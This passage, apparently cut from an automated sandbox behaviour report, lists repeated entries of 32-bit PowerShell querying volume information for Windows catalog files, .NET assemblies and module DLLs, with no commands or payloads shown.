    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
